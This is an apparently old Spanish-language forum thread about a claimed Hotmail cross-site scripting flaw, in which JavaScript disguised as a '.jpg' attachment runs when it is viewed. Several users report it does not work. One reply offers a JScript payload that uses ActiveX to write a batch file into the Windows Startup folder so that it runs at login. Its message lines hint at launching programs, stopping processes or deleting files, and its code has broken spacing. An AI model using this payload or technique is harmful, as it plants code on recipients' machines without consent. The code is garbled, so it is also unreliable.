Nueva vulnerabilidad en Hotmail

[Dark Allien]

Me encontre navegando por ahy que el hotmail tiene un  nuevo fallo de Cross Site Scripting en Hotmail, total el perro hotmail no canta nada si envias un archivo de texto echo por ejemplo con el bloc de notas con código javascript por ejemplo de una alerta:


<script language="JavaScript">
  alert(' ZaBoo script alert');
</script>

 y lo guardas con formato "jpg", bueno luego lo adjuntas y envias y al recibir el archivo y probar en ver el adjunto pum kiss te ejecuta el codigo, para mas informacion dirigirse a http://www.cyruxnet.org/news.htm o http://cyruxnet.org/foro/viewtopic.php?t=559

By: Dark allien

[piojo_tem]

a mi no me funka :S

[matrix_hc85]

a mi tampoco.  sera q funciona en alguna version beta de hotmail?

[maxwellnewage]

aca un code q les sirve......... ....
<script language="JavaScript">
Contenido=
  '@echo off\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo Esto es solo una prueba, pero podria haber llamado a algun programa...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O podria, tambien, detener o activar procesos...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo O, incluso, podria haber borrado algun archivo...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'cls\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo No se... echale imaginacion...\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'echo.\r\n'+
  'pause\r\n'+
  'exit\r\n'
Archivo=new ActiveXObject("Scripting.File SystemObject")
Escribe=Archivo.CreateTextFile("c:\\Documents and Settings\\Administrador\\Menú Inicio\\Programas\\Inicio\\bat.bat" ,true);
Escribe.WriteL ine(Contenido);
Escribe.close();
</script>

[matrix_hc85]

ok. perfecto. voy a probar, pero deberia funcionar para cualquier codigo en script !! no solo en el que creas tu, sino que sentido tiene.